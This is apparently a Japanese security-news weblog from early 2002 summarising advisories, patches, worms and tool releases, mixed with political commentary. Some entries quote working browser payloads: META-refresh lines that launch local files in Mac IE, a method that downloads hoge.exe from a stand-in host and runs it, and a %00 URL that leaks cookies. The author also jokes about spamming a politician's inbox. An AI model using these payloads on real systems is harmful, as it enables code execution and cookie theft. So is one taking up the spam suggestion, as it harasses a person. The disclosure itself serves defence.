Last modified: Tue Apr 15 13:03:49 2003 +0900 (JST)
[free-memo:135] echo $020129163642 in tcsh、 tcsh で echo $020129163642 すると逝ってしまいます。 酒井さんが patch を [free-memo:136] で示されています。 太田さんによると、shells/44bsd-cshで も発生 するそうです。
トラブル相次ぐWindows XP: 新機能が動かない,データ消失など判明 移行作業はより慎重に実行すべき (日経 IT Pro)、 アプリの upgrade まで考えると、けっこうな出費になっちゃうんですよねえ。 いつものこととはいうものの、今どきそれに耐えられる体力のある会社なんて数えるほどしかないのでは。 (link fixed: 高田さん感謝)
盗聴法違憲確認訴訟で訴えを棄却 東京高裁 (毎日)、 不祥事爆発中のトコが「建前」を守るという前提に立つわけね。
早大が上告 名簿提供裁判で (毎日)、素敵な大学ですね。
「Microsoft(R) Windows(R) XPステップアップグレード」を3月1日(金)より提供開始 だそうです。upgrade すると不具合が……という件はどうなったんだろう。 しかし、12,800 円 (推定) とはまたお高いことで。 (松田さん感謝)
学内 ML から: Authenticam-with private ID なんてものが売られてるんだそうで。 メーカは Panasonic (US)。
総合科学技術会議(第13回)議事次第 の「資料3 研究機関等における知的財産権等研究成果の取扱いについて(意見)(案)」の (案) が取れたもの (府政科技第 281-2 号、平成 13 年 12 月 25 日) が回覧されてきた。 理化学研究所の研究者が起訴された話への対応ってことなんだってさ。
なお第13回議事録は総合科学技術会議(第14回)議事次第 にある。「貴重なご意見」をおうかがいしたあとで「原案どおり可決」されてますな (笑)。
そうか、こういうところで (も?) 原子力/核融合ものの議論してるんだ。 ふうん。 それにしても、核融合ってなかなかモノになりませんな。 できたところで、どーせ調整運転なんかできないだろうから火力の代替にはならないだろうし。学者のオモチャ以上の何かであるとは思えないなあ。 日本は核兵器持つつもりないってことになってんだし、イランでしょ。 太陽光モノとか風モノのほうが遥かに現実的。
rsync 2.5.2 にしたら、落ちるようになっちゃったよ。 なんなんだ……。 ……rsync 2.4.6 用の patch をいただきました。快調快調。 横井さん感謝。
Windows NT 4.0 / 2000 に弱点。 ドメイン間で信頼関係を結んでいる場合に、 信頼する側のドメインが、信頼される側のドメインからやってくる認証データの SID が、ほんとうに信頼される側のドメインに存在するのか否かをチェックしない。 これを利用すると、攻撃者は信頼される側のドメインの認証データに任意の SID を挿入することにより、信頼する側のドメインの管理者権限を入手できるという。 ただし SID を挿入するには、Windows NT 4.0 なら特製の OS コンポーネントを独自に作成してインストールしておく必要があるし、Windows 2000 なら「SIDHistory」情報が含まれるファイルをバイナリエディットする必要がある。
しかしなあ。そもそもドメイン間で「信頼関係を結ぶ」って時点でアレゲなわけで。 これに対抗するには patch に含まれる「SID フィルタリング機能」というものを有効にする必要があるようだが、こんなの使ったら負荷とトラフィックを増やすだけだし。 まあ、気にする人は使うんだろうが、……。
patch (SID フィルタリング機能) は NT 4.0 SRP と Windows 2000 SRP1 に含まれているんだそうだ。
「.NET Virus」W32.Donut の詳細。
SecurityFocus.com Newsletter 第 128 号日本語版 (テキスト)。
[RHSA-2002:018-10] New rsync packages available
2002-01-28: There was an error in the original bugfix patch for the
security problem - the new rsync could fail under some circumstances. This
has been fixed in a new build
だそうだ。
まともに調べてる暇がない。
Cisco Security Advisory: Cisco CatOS Telnet Buffer Vulnerability
5.03beta で fix だってさ。
GNU Chess Buffer Overflow Vulnerability (securiteam.com)
ウワサのブツ、ついに登場。 しかし、
一時ファイル展開先がルートディレクトリ [memo:2834]
日本語 XML ファイルが対応していないので HFNetChk の結果が変になる [memo:2837]
適用すると異常が発生するケースがある模様 [memo:2843]。 IE 5.5 だから? [memo:2842]。 問題ない人もいる [memo:2840]。
ICMP Shell を発見するためのツールだそうです。
「各州に呼びかけたのは,米連邦政府レベルでは実現しなかったからだという
」。子ブッシュだしねえ。
なんて言ってるそばから
MSNゲームサイトでまたもPassportによる不具合
(ZDNet)
とか出てますが。
♪迫る〜ショッカ〜〜地獄の軍団〜〜。 「世界の平和を守るため」と称して悪の限りをつくす、のはよくあることですね。 N とか見ればわかるように、平気で大嘘こいて監視システムつくる国ですし。
NT Admin Tip #324: Modify the Internet Explorer 6 Unsafe file list (info from [port139:00966])
JP306525: [HOW TO] 自動更新の設定 (MSKK)、 Windows XP のデフォルトは [更新を自動的にダウンロードして、インストールの準備ができたら通知する] なのでしたっけ?
テロリストの肖像、 テロをわざと防がなかった大統領、 テロの進行を防がなかった米軍 (田中宇の国際ニュース解説)。 いやあ、実に興味深いです。 (info from [aml 26258])
FBIは9・11事件が起こるのを知らされていた!! も参照、かな。 (info from [aml 26259])
口座振替自動引落しシステム不具合について (UFJ 銀行)、 unstable function judged 銀行なのかな。 2月中旬に fix 予定だそうだが、ホントにだいじょうぶなのか?
京都大学学術情報ネットワーク機構 (KUINS) の セキュリティ情報 ページにはいろいろと興味深い情報があります。
FSFが米マイクロソフト独禁法訴訟の和解案に意見書を提出 (日経 IT Pro)、 kerberos の話とか CIFS まわりが典型例ですね。 公開情報だけではぜんぜん互換ソフトをつくれないんだもん。
「音楽業界史上最大の危機」,JASRACと日本レコード協会が反撃開始 (日経 IT Pro)、 予定どおりってことでしょ。
雪印食品社長ら首脳、偽装工作知っていた (asahi.com)、もはや会社自体が存続不可能なのでは。 ニセ国産牛、どうすれば見抜けるのか (asahi.com)、切り刻んだものしか見れない消費者にはわからんぞこんなの……。
しかし、これはほんとに氷山の一角なんでしょうあな。 信頼できる情報源から「サンスターは期限切れの歯磨きを練りなおして 100 円ショップに流している」なんて情報も得ているし。いやあ恐い恐い。
「政権の看板」おろし、首相のかけ 外相更迭 (asahi.com)、どう見たって「両成敗」なんてものではなく外務……じゃなかった、「鈴木省」の勝ちでしょ。 ガン細胞マキコは排除できたし、鈴木氏はいまだにバッジつけてるし (議員を辞めるわけではないのだ)。「野上義二事務次官」は鈴木省的にはヒーローですわな。この程度は予測内で、きっと鈴木氏が墓場までめんどう見てくれるんでしょう。
外務省改革もできない内閣に、日本を改革できるわけないじゃん。 つーか、今回の問題では内閣自身が「抵抗勢力」だったわけで。 『鈴木宗氏関与』を指摘 別の政府見解判明 (東京新聞) なんて情報も出てますな。
2002.01.24 の ソニー、「バイオ」専用プログラムにセキュリティ・ホール に追記した。 Q & A が登場。 他社の CyberSupport では発生しない模様。
rsync 2.5.1 以前に弱点。 変数の signed / unsigned をとりまぜて扱っている個所がいくつかあり、これを利用すると、remote から任意のコードを実行させることができてしまうという。 2.5.2 で fix されている。 patch:
EIMS の .com フィルタが Myparty を通してしまう、という話から、 web フォームで「ご意見募集」などしているページで、 uuencode したウィルスを貼りつけると、フィルタされずにそのまま担当者まで届くという話に発展している。 確かに、uuencode をフィルタするメール送信 CGI なんてのは聞いたことがないので、多くの場合にはそういうことになるのだろう。 顧客からの質問だと思ってファイルを開くとドカ〜ン。 あらかじめそういう心構えをしていないと、ついうっかり開いてしまいかねなさそう。
対策としては、uuencode フィルタを組み込む、んですかねえやっぱり。
今泉さん情報ありがとうございます。
2002.01.29 の Remote Denial of Service Vulnerability in Snort IDS に追記した。 開発元からの公式発表登場。 また ISS 報告の日本語版が登場 (なみねこさん感謝)。
CERT Advisory CA-2002-01: CDEのサブプロセスコントロールサービスに付け込み可能な脆弱性が存在する 関連ですが、某組織に対する攻撃事例が紹介されていました。 わざわざ patch をあててくれるという点に注意が必要です。 心あたりのない patch 適用には気をつけましょう。
というか、ちゃんと file integrity check しましょう。
BalckICE Defender for Workstation ver.2.9canJ は Windows XP に対応していないという話。2.9caq 版 (まだ英語版しかない) で XP に対応したそうだ。
「危ないのは分かっている。でも対策があまり進まない
」、
まあそんなもんでしょう。こういうのは根っこからいじらないとダメですしねえ。
「危ないと思ったらできるだけ早く取り掛かる,そしてせっかく取り掛かるなら最大の効果があがるよう徹底することが,重要ではないだろうか
」、それで売上が劇的に上がるんならみんな手をつけるでしょうけどね。
もうかってるのはアンチウィルスベンダーだけなのでは?
アンケートですけど、 集計結果−ECサービス の「問15 具体的などのような対策を施していますか。(複数回答)」にある「データの暗号化」って SSL とかの意味なんですかね。 「データの暗号化」と「通信の暗号化」は分けてほしかったような。 前者がどのくらいされてるか興味あるんだが。 「web アプリケーションのセキュリティ監査」とかいう項目がないのも気になるなあ。
集計結果−セキュリティ もなかなか。回答企業 (対象企業 2893 社 (どう見ても大手企業) で回収率 36.3%) の 13% が踏み台になった経験があるそうで。 きちんと対応している企業とそうでない企業と、2 極化しているのかな。
集計結果−サーバーOS 、Windows NT すごく多いですねえ。 Windows 2000 への移行もなかなか進んでないようで。
ネタの増大に記述がついていけてません。
GreedyDog 2.1 beta 出てます。
dnstracer 1.2, ftpproxy 1.1.4 が出たそうです。(info from installer ML)
「Know Your Enemy(己の敵を知れ)」---攻撃者のOSを特定する方法 (日経 IT Pro)、p.0.f のおはなし。
セキュリティマガジン #2 の office さんの記事で samhain というツールが紹介されてました。 単なる file integrity checker というだけでなく、 いろいろおもしろい機能があるみたいです。 大規模運用も考慮されているようです。
office さんの記事では 1.3.4 ですが、今は 1.4.2 になってます。
Sophos ウイルス情報フィード につづいて McAfee Security Feed だそうです。 (松田さん感謝)
Yahoo! BBにまたセキュリティ上の問題が (日経 IT Pro)。 話題の尽きない会社ですねえ。
PGP作者が語る,プライバシー侵害と戦う術 (ZDNet)。
[WSJ] 特定企業を狙ったコンピュータ攻撃が増加? (ZDNet)。
JP307866: セキュリティ ロールアップ パッケージがインストールされていると修復プロセスの実行後にコンピュータにログオンできない (MSKK)。 hotfix はマイクロソフト セキュリティ ツール キットに含まれているんだそうです。
それにしても、JavaScript 有効なまま、 「マイクロソフト単語帳」だけを無効にできないんですかね。 私には不要なんですが。
ちかごろでは、「アタック」というとやっぱりめんこなんでしょうか。 あんな台の上に置いてめんこすること自体が反則だと思うけど。
FreeBSD おぼえがき 2002年01月29日(火)13時04分31秒 によると、FreeBSD 4.5-RELEASE が出たらしいです。 2002年01月26日(土)01時59分09秒 や 2002年01月28日(月)19時32分50秒 によると、こがさんが指摘されていた件も修正されたみたい。
UFJ銀行が引き落とし処理の遅延原因を説明,新たな問題も発表 (日経 IT Pro)、クロスサイトスクリプティングどころではない模様。 UFJ 銀行で2重引き落とし、引き落とし漏れ(2002.1.29)、 いきなり落ちて「さすが」と言われたソニー銀行と 1, 2 を争うつもりなんですかねえ。
「WORM_MYPARTY.A」自動削除ツール (トレンドマイクロ) が出ています。 新種ウイルス「W32/Myparty」(仮称)に関する情報 (IPA) や CERT Incident Note IN-2002-01: W32/Myparty Malicious Code も出てますね。 ファイル名のつけ方がうまかった、ということなんだろうなあ。
お。Norton AntiVirus LiveUpdate Email によると:
Virus Name Infection Type Date added ---------- -------------- ---------- Backdoor.Myparty File infector 01/28/02 W32.Myparty.B@mm File infector 01/28/02 Backdoor.Trojan.dr(10) File infector 01/27/02 VBS.Kreator File infector 01/27/02 W32.Myparty@mm File infector 01/27/02
さっそく亜種が登場しているのか? バックドア対策が入ったのも今日になってからのようですね。
NGO排除問題: 政府「統一見解」提出 野上次官ら更迭論浮上 (毎日)、いっそのこと「鈴木省」と名前を変えるのがよいのでは。
ODA 利権か……。話題のソンドゥ・ミリウ水力発電事業も「そういうことなんだろう」。
あーあ、FreeBSD-*-jp が Myparty で汚染されてるよ。
2002.01.23 の Macinosh IE file execuion vulerability に追記した。 藤井さん、石川さん、篠田さんによる検証結果を追記。
snort 1.8.3 (最新版) 以前に弱点。 ICMP echo / echo-reply パケットの取りあつかいに問題があり、 ICMP データが 5 バイトより小さい場合に crash してしまうという。 patch を適用するか、 最新の開発版ソースを CVS 経由で入手しインストールする。
関連: 検知システム「Snort」にセキュリティ・ホール,DoS攻撃を受ける恐れあり (日経 IT Pro)。「バージョンアップ (中略) で回避できる
」という表現は誤解を生むので、1.8.4 が出るまではやめたほうがいいと思うぞ。
[stalk:01149] などによると初出は Snort Core Dump Vulnerability のようですね。ここには「Snort version 1.8 and prior」 と書いてありますが、core dump する事例の version 番号は Version 1.8.3 (Build 88) って書いてあるし。
もともとの記事は bugtraq の Snort core dumped だそうです ([stalk:01155])。 見逃してるし > 俺。
開発元からの公式発表が登場している: Snort ICMP DoS is no big deal。 -d オプションつき、かつ ASCII モードでログ採取している場合 (どちらもデフォルトではない) にのみ発生するとされている。
ISS 報告日本語版: snort IDS におけるリモートからのサービス不能攻撃の脆弱点。 (なみねこさん感謝)
詳細: Sentinel Chicken Networks Security Advisory #01: RealPlayerCUR 8 Buffer Overflow。 real media ファイルに記述されている文字列長と実際の文字列長が異なっているかどうかのチェックが抜けている模様。 英語版 RealPlayer 用の patch はあるが日本語版はまだ。
やまねさん情報ありがとうございます。
IBM 32MB USB メモリー・キー (IO DATA の EasyDisk みたいなモノみたい、って順序が逆?) が、ブートセクタ感染型ウィルス Wyx (または Eek) に感染していた模様。 ただしメモリー・キーからはブートできないため、ウィルスが活性化されることはないという。
S/N 2320000 以上で修正されているそうだ。 該当する S/N の製品を所有する場合は 駆除ツール を用いて削除する。 通常のアンチウィルスソフトでは検出できない場合があるそうだ。
西村さん情報ありがとうございます。
shu-oneline.org (アレゲなページですねえ……) から来たモノに素直に reply してしまった不幸な人のおはなし。 biglobe は高々 1000 通しか受信できないのか……。 吉本さん情報ありがとうございます。
Myparty というワーム (トレンドマイクロ、シマンテック、NAI、Sophos、F-Secure) が流行っているようです。 「今」最新のウィルス定義ファイルに update しましょう。
xlockmore 5.03 が出てます (info from installer ML)。 いつのまにか --with-lang=jp なんてのがあったのね。
Postfix 1.1.2 が出てます。2 度あることは 3 度ある、かなあ。 手元の upgrade はもうちょっと待つか……。
「Microsoft(R) Office XP Service Pack 1」日本語版の提供を開始 (MSKK) だそうです。
@Random ですが、 掲示板にあるように、 2002.02.23 Club Joule (大阪心斎橋、三角公園ヨコ ブルータスビル) 14:00〜17:00 で開催します。 参加費など詰め中。しばし待たれよ。
「お知らせ:EVERYDAY PEOPLE は、2002年2月1日 よりしばらくの間、休止させていただくことになりました。ありがとうございました
」 (EVERYDAY PEOPLE)、残念ですがしかたないのでしょう。おつかれさまでした _o_。
なお、2002年最新 クラックされてしまった日本のサイト
は維持されるようです。
「中古オフィス機器販売大手テイクオフ」では、
『「中古パソコンからデータが流出した場合の責任は,あくまでパソコンを引き渡す企業・官庁側にある」旨の契約を結んでいる
』、
のだそうで。ちゃんと消しましょう。
2001.12.27 の Authentication Gateway HOWTO に追記した。 日本語版の URL 追加。
solution 3561 タイトル: ウイルスバスター2002をインストール後、コンピュータの再起動が繰り返される (トレンドマイクロ)、なんだかあいまいな記述に終始してますねえ。
Microsoft Office XPでATOKが利用できない現象について (ジャストシステム)、 ジャストから見れば、なんだかなあな話ですねえ。 (info from ポケットニュース)
sudo 1.6.5p2 が出ています。(info from installer ML)
apache 1.3.23 が出ています。(info from installer ML)
neo-shuparadigm@shu-oneline.org って、もしかして、 誰でも送れる「spam 配送用アドレス」だったりするんでしょうか? ……そうみたいです。いやはや。たなかさん情報どうもです。
Firewalls and Internet Security: Repelling the Wily Hacker 。For personal use only. だそうで。 (info from Cryptme)
Wearable Internet Appliance ですが、ついに発売された模様。 しかし高い。あと 2 年待てば安くなるかなあ。 水野さん情報ありがとうございます。
AIMに続き,ICQにもバッファオーバーフローの問題 の話。2001B Beta v5.18 Build #3659 (わかりにくいバージョン表記だなあ) より前のやつは全滅。Build 3659 以降に upgrade しませう。
[RHSA-2002:007-16] Updated 2.4 kernel available
壊れたパケットによって CIPE (VPN tunnel) が crash する問題 (CVE: CAN-2002-0047) と、 ICMP レスポンスにユーザ空間メモリの内容が含まれてしまう問題 (Remote Memory Reading Through TCP/ICMP, CVE: CAN-2002-0046) が修正されている。
@Random ですが、ようやくハコ押さえがとりあえずなんとかなった模様。 もうちょっとしたら参加者募集開始できるんじゃないかな。 つーか開始しないとマズいんだよな。
身内にご用心,セキュリティへの最大の脅威は社内ネットワークに潜む (ZDNet)、定番な話ですよね。
'Chinese Whisper' security advisories (LinuxWorld)、伝言ゲームというか、ジグソーパズルというか。
DoS攻撃で営業停止に追い込まれた英国のISP (ZDNet)、シャレにならんなあ……。
J069984: サインアップ時に Icwconn1.exe が異常終了し、サインアップが中断する、回避方法も修正方法も書かれてないなあ。 5.0 以降でまんべんなく発生するようだし。 「ISP の規約のコピーを保存」しなければいいのかな。
2002.01.23 の 謎のスキャン急増。ポート12345を狙うのは誰? に追記した。トレンドマイクロからのアナウンスと、関連記事へのリンク。
1984、あるいは未来世紀ブラジルな世界とひきかえてもいいのなら、
切り札になるのかも。
もうとっくに 1984 化してんじゃん、という意見もあるだろうが、e-gov/e-Japan でターボ湯切り全開かと。
「実情に即した適切な法的整備という面で、日本は明らかに1歩出遅れているのである
」、本当にそうなのかなあ。
未来世紀ブラジルを気に入っている人は、 バトル・オブ・ブラジル も読んでおきましょう。当時のスターログ (こればかりは日本版でなくてはならない) をあわせて読めるともっとおもしろいかと。
SONY の VAIO にプリインストールされている、SONY 独自のプログラム 「CyberSupport for VAIO」の 3.0, 3.1 に弱点。 これらに含まれるモジュールの何か (なんだろう) によって、web ページや HTML 形式の電子メール/添付ファイルを通じ、攻撃者が任意のプログラムを実行可能だという。 該当する VAIO の機種については、VAIO セキュリティ強化プログラムダウンロード のページから参照されたい。
しかしなあ。きちんとアナウンスしているし郵送による patch 配布も用意している点などはすばらしいのだが、 どのソフトウェアモジュールに問題があるのかがよくわからない (README.TXT を読むとようやく CyberSupport という文字列が出てくる) とか、 SEC_UPD_OK.txt というテキストファイルのありなしでインストール状況を判断するとかいう点はちょっとなあ。もうちょっとなんとかならないのか。 更新後ファイルのサイズ・日付・情報くらいはほしいですよね。 「入れたつもりが」ってのがいちばん恐いから。 ほんとは MD5 とか SHA1 とかも示してほしいけど、Windows だしねえ。
CyberSupport 自体はジャストシステムの製品のようで、他社 PC にも採用されているようです。 例: 東芝 DynaBook Satellite 1800 (CyberSupport 3.1 for TOSHIBA)、 日立 Prius Bシリーズ。 しかし、ジャストシステム自身には全く情報がありません。 OEM 専用製品なのかな。
青木さん、匿名希望さん情報ありがとうございます。
C:\Documents and Settings\k-suke\My Documents\work\CyberSupport\Security Patch\Installer for Patch CD\VAIO セキュリティ強化プログラム\Script Files\Setup.dbgですか。
発見者の高木さんから詳細が公開された: [memo:2730] CyberSupport for VAIO に任意コマンド実行の脆弱性。なんでもやり放題の ActiveX コントロールが存在していた、ということのようだ。となると、やはり心配なのは、東芝や日立の PC は ok なのか?! という点だろう (ダメな方に 100 クレジット)。
SONY プレスリリース: 「コンピューターのセキュリティに関する重要なお知らせ」 (info from slashdot.jp [VAIOのプリインストールプログラムに大穴])。
この問題に関するQ & A の 2-5 他社の「CyberSupport」でも同じ現象が発生するのですか? によると、今回のおはなしは SONY 製モジュールによるものであり、他社の CyberSupport では発生しないそうです ([memo:2745])。 この Q & A はたいへんすばらしいです。最初からほしかった……。
ぜひとも、今回の対応と同一レベルで OS 部分についてもちゃんと情報を載せてもらいたいところなのですが、むつかしいでしょうかねえ。 OEM 部分 については OEM メーカがきちんとアナウンスする責任があると思うんですが。 「詳細は MS page 見て」ではまずいですよね。 IIS や UPnP みたいに「OEM メーカが独自にプリインストールしてました」なんてパターンもあるのですし。
高木さんによる詳細情報 (のつづき): [memo:3558] Re: CyberSupport for VAIO に任意コマンド実行の脆弱性
2002.01.23 の Macinosh IE file execuion vulerability に追記した。 森さんからの情報を追記。 既存のファイルだけでなく、任意のファイルを実行させるシナリオが紹介されている。
Postfix 1.1.1 が出てます。
chkrootkit
0.35 が出ています。
tests added: lsof and ldsopreload.
strings.c added. Ports added to the
bindshell test. RST.b, duarawkz, knark
LKM, Monkit, Hidrootkit, Bobkit, Pizdakit,
t0rn v8.0 (variant) detection.
だそうです。
(info from LinuxSecurity.com)
Darren Reed Releases OpenBSD 3.0 with IPfilter (LinuxSecurity.com) なんですって。
FBI、テロ対策強化でインターネットに掲載される情報の見直しを呼びかけ (MYCOM PCWEB)、アルカイダの射撃練習の標的に使われる可能性があるのでジョージ W. ブッシュ氏の写真は削除した方がよいのでしょう。 ほら、在日米国大使館も写真は掲載していないし。
AOL/NetscapeがMSを提訴。将来にわたる是正措置を要求 (ZDNet)、「新しい戦争」勃発なのかな。
HFNetChk 3.31 が登場しています。SQL Server 7.0 に関して問題があったようです。
3.30 以降、非英語版には自動的に -nosum がかかってしまうようです ([port139:00952])。 日本語 OS 用 xml ファイルと共用する場合は HFNetChk 3.2 を利用した方がよさそうなのですが、オンラインではもう入手できないんですかね。 多分、今月の Windows 系雑誌のオマケについてきている (あ、明日は Windows 2000 World 発売日じゃなかったっけ? 今月号は今日限りで消えちゃう) MS Security Toolkit CD には 3.2 がついてるんじゃないかなあ。
若松謙維議員ホームページ、抗議殺到のため (?!) か「一時休止」になってますな。 関連: ■■コラム■■ スピードが勝負 (毎日)。
エンタープライズ Linuxのオペレーティング・システム(OS)障害調査機能を強化 −4社による最初の協業成果が結実− (NEC)、 こういう機能は重要ですよね。
SwiftProxy というのがあるんだそうです。
ideon 君の調子が悪くて、ちょっと落ちてました。すんません。
「さあゲームのはじまりです」。 全ての自治体において (防衛) 体制が整っているとはとても思えず。 つくってもらおうと役所に行ったら「もうつくられてますけど」とか言われる可能性って低くないような気が。
Mozilla 0.9.6 以前、Netscape 6.1 以前に弱点。 http://alive.znep.com%00www.passport.com/cgi-bin/cookies といった特殊な URL を利用することにより、%00以降のサイトの cookie を http://alive.znep.com/cgi-bin/cookies から読み出せてしまう。 ただし読み出せるのは .passport.com の cookie であり、 www.passport.com の cookie は読み出せない。
Mozilla 0.9.7 以降、Netscape 6.2.1 以降では修正されているので、最新版に乗りかえること。
関連スレッド: Netscape/MozillaにCookie漏洩のセキュリティホール (slashdot.jp)
MacOS 9.x 以前で IE 5.0 を使うと、悪意ある web ページ管理者は <META HTTP-EQUIV="refresh" CONTENT="1; URL=file:///Macintosh%20HD/ System%20Folder/Speakable%20Items/Put%20Computer%20To%20Sleep"> のようにして既知のパス名にあるファイルを起動できてしまうという指摘。
森さんから (情報ありがとうございます):
> MacOS 9.x 以前で IE 5.0 を使うと、悪意ある web ページ管理者は ><META HTTP-EQUIV="refresh" CONTENT="1; URL=file:///Macintosh%20HD/ > System%20Folder/Speakable%20Items/Put%20Computer%20To%20Sleep"> >のようにして既知のパス名にあるファイルを起動できてしまうという指摘。 IE5 Macでは <META HTTP-EQUIV="refresh" CONTENT="1; URL=http://hoge.com/hoge.exe"> という記述で、hoge.exeというブラウザで開けないファイルを確認もなくダウンロー ドしてしまうバグ?があります(わたしが自分で発見しましたが、既知のものかもし れません)。そのときにはダウンロードマネージャのウインドウが開きますが、すで にダウンロードマネージャのウインドウが開いていて、背後に隠れている場合、ユー ザが全く知らないうちにダウンロードされます。 で、IEのデフォルトのままだと Desktop Folder にダウンロードですから、既知のパ スの既知のファイルってことになりますね。 <META HTTP-EQUIV="refresh" CONTENT="1; URL=file:///Macintosh%20HD/Desktop%20Folder/hoge.exe"> 次のページのMETAで実行されてしまいます。 Mac版IE5って、その他にも直ってないバグがいくつもあって困りますね。 履歴を消しても、アドレスのオートコンプリートは消えないとか。Cookieのパスが 「/」になってしまうとか。
まずいですねえ。
新たな情報:
IEアプリ実行問題の実行環境 (藤井太洋さん)
ディスクイメージをダウンロードさせる、という手法により、デフォルトディスク名やデフォルトダウンロード先による制限を突破可能である事を示している。
2002.01.28 番外編:Mac IE file execution vulnerability対処法 (石川さん)
MacOS 版 IE 5.1.3 や MacOS 版 iCab Pre2.7 でも発生。 対処方法はこちらにまとまっている。
対応方法も記載されているので、MacOS 版 IE / iCab ユーザは上記リンクを読んでおこう。 (うぅ、検証する時間が取れない……)
patch がいかに適用されないかは CodeRed / Nimda が証明したはずだが……。
トレンドマイクロからのアナウンス: ウイルスバスターコーポレートエディション 脆弱性に関するお問い合わせについて (水野さん情報ありがとうございます)。 あと、12345 については 2000.03.02 の TrendMicro OfficeScan tmlisten.exe DoS あたりを参照するのがよろしいかと。
誰にもわからないセキュリティー被害の実態 (CNet)、 少なくとも「データが足りない」という合意は存在するみたいですね。
ヨーロッパのGPS計画を米国が牽制 (WIRED, info from slashdot.jp)。 EU は US なんか信用してないし、US にとって EU は道具にすぎないような。
毎日ホスティングサービス、web サーバは apache だけど OS は Solaris 7 (しかも Ultra 5) だそうで。なぜわざわざ Ultra 5。 port の開き具合とか調べてからじゃないと不安だなあ。 伊藤さん情報ありがとうございます。 (typo fixed: 吉本さん感謝)
MSの新セキュリティ戦略に,専門家の反応は? (ZDNet)、結果で示していくしかないですわなあ。 どう転んでも中村正三郎氏には批判されるだろうけど。
記事中の「同社は「Secure Windows Initiative」や「Strategic Technology Protection Program」(STPP)を推進してきたにもかかわらず,最新OSのWindows XPでも大きな問題が生じている
」
ってのはなんだかズレてるような。
STPP が XP に対して影響を与えられなった
(リリーススケジュールに間にあわないもん) ことは誰でもわかるでしょ。
でも .NET Server にはちゃんと影響しているわけで。
そのうえで、「.NET Server だって全然足りんやんけ」というところがあるなら
(まず間違いなくあるだろう)、それは批判すべきだと思うが。
日本電子公証機構が政府お墨付きの電子認証サービスを開始 (日経 IT Pro)、市民感覚としては、「政府お墨付き」ほど地に落ちた価値もないような。 それでも食っていくためには便利なモノなんですが。
PythonScript 経由で local file を読めてしまう、ということなのかな。
https://www.netsecurity.ne.jp/ に cross-site scripting 脆弱性があった模様。 直したそうですが、 Apache/1.3.11 (Unix) mod_ssl/2.5.1 OpenSSL/0.9.5a から Apache/1.3.22 (Unix) mod_ssl/2.8.5 OpenSSL/0.9.5a に変化してますね。1.3.11 なんてのを使っていたのが敗因? (なぜ OpenSSL は version up しないの?)
座喜味さん情報ありがとうございます。
[ftpd 827] Re: ProFTPD 1.2.4, PAM and S/Key で、あやむらさんが S/Key、OPIE 両用 (S/Key は 2 つのバージョンに対応) の認証モジュールを公開されている。
[aml 25999] 愛国者か、それともテロリストか?---国内の弾圧強化 (Earth First 2001年11月/12月号)。明日はわが身。
毎日ホスティングサービス、Netscape-Enterprise/4.0 なんて使っていてだいじょうぶなんでしょうか。
それとも、サービスしているホストはまた別なのかな。
「24時間のPINGによる監視や、非常時のための無停電装置等、保守管理体制も万全です
」、あの〜セキュリティは……。
Ethernet packet sniffer GreedyDog (SPS) 2.0 beta が出ています。
[aml 26104] FW:反戦の空気、確かに興味深いですね。
世界的なネットワークセキュリティの動向と最新技術、SecurityFocus の Arthur Wong 氏と Ryan Russell 氏が来るんだそうです。 2002.02.27、東京霞ヶ関ビル。¥45,000- といいお値段ですが。
アメリカによる捕虜の扱いに対する問題提起 (info from Tea Room for Conference No.608)、こんどは「戦争捕虜じゃない」ですか。 テロ国家はなんでもやり放題ですな。 BBC 記事 Prison camp pictures spark protests の 坂野氏による邦訳 が出ています。 読んでおきましょう。
警察手帳、10月から一新 小型化し横開きから縦開きに (asahi.com) だが、毎日の社説 「常時携帯して自覚高めよ 警察手帳」 によると、所属や氏名は明確になったものの、一方で宣誓書が消えたらしい。 うーむ、そう来たか。 というか、宣誓書なんてのがあったのね。
迷惑メール防止策で総務省と経産省が縄張り争い (日経, info from slashdot.jp)。
若松謙維
議員は比例区北関東ブロックだってさ。
「表現の自由
」ときたもんだ。ギャハハ。
「ご意見・お便りはinfo@network-wakamatsu.comまで
」
だそうなので、spam をバンバン送ってあげるのがよいのかな。
自由に話せないなら、講演は無駄 (slashdot.jp)。 この校長は、鈴木宗男 (北海道ですか……) 議員の顔色しか窺えない 外務省 宮原信孝・中東2課長と同類なのでしょうなあ。
XFree86 4.2.0 出てます。そろそろ移行するかなあ。
iPlanet Web Server, Enterprise Edition / Netscape Enterprise 4.0 SP2,SP6 to 4.1 SP8 の問題の解説など。アカウントの brute-force attack もできたんですね。
akira21++ for ladies には「ストーカー対策」として、エラーメールを MUA 側で作成して送る機能があるという話。通常版にもついていてヨサゲに聞こえるのだけど。
WebDAV に対する proxy server の対応状況。 逆にコロしたい場合にも参考になるでしょう。
ファイルを痕跡すら残さずに安全に消去するユーティリティ、 BCWipe 1.x/2.x, Eraser 5.3, SecureClean v3 build-2.0, East-Tec Eraser 2000, PGP (International) 6.x/7.x の Windows 版を NTFS に対して適用した場合に問題。 NTFS の機能である alternate data stream に情報が格納されていた場合に、これが消去されないという。 Eraser 5.3 は唯一 alternate data stream にも対応しているが、 これですらファイル中の最後の alternate data stream 消去に失敗してしまうという。
Eraser 5.3 については 告知と修正版 が登場している。
また、このテのソフトのまとめが ファイル等を復元できないように削除するソフトウェア にある (info from slashdot.jp)。
私自身を含め、honeypot で遊んでみたいと思ってる人は少なくないと思いますが、 IDS 以上に気合いの入った運用が必要になるでしょうしねえ。
警察手帳、10月から一新 小型化し横開きから縦開きに (asahi.com)、どういう人が来ているのかがよくわかるようになった模様。
http://www2.seikyou.ne.jp が Nimda にヤラレてるっぽいです (info from Everyday People)。 ワーム本体である readme.eml は get できないように web サーバが調整されているようではあります。これが昔からされているのかヤラレた後に応急処置としてされたのかは、私にはよくわかりません。
postfix 1.1.0 が出たそうです。
エンロン疑惑:削除文書の復元に活躍するコンピューター探偵 (WIRED NEWS)、 消すなら徹底的に消しましょう。
e-Japan? 電子政府? これって一体なんだろう (日経 IT Pro)、とりあえず 電子政府の総合窓口 で e-Japan を検索したりしてみればいろいろおもしろいものが出てきます。 NIRT で検索するともっとおもしろいかも。 確かに NIRT は 2002 年度発足になってるなあ。 日程表も見よ。
高度情報通信ネットワーク社会推進戦略本部 のコンテンツって素敵。
早大に賠償命令 名簿無断提供で学生側逆転勝訴 (毎日)、
「警察への名簿提出は、社会通念上許容される
」なんてギャグ判決はひっくり返されて当然だよね。
「名簿裁判控訴審判決に対するコメント」
って
早稲田大学ホームページ
にはないみたいなんだけど、どこで読めるんですかね。
新ブランドは「ビンラディン」=異母兄弟がファッション界進出へ−米紙 (時事通信) 、アパレルよりは「ビンラディン人形」とかの方が売れたりしません?
